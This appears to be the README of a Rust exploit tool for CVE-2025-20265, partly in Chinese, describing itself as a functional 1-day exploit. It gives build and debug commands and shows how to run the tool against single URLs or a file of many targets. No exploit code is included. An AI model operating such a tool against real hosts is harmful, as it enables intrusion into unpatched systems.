这是一个针对 1-day 漏洞的功能性漏洞利用程序。
使用风险自负。你应对自己的行为负责。
cargo build --release
$ ./target/release/cve_2025_20265 --help
# or
$ cargo run --release -- --help
要调试,请使用环境变量 RUST_LOG:
RUST_LOG=debug cargo run --release -- --help
# use either the build or the path to the executable file
$ alias EXE="cargo run --release"
# or
$ cargo build --release
$ alias EXE="./target/release/cve_2025_20265"
# check the target
$ EXE https://10.10.10.1:4443/
# read targets from the file
$ echo -e "https://10.10.10.1:4443\nhttp://127.0.0.1\nhttp://10.10.10.10" > targets.txt
$ EXE --from-file targets.txt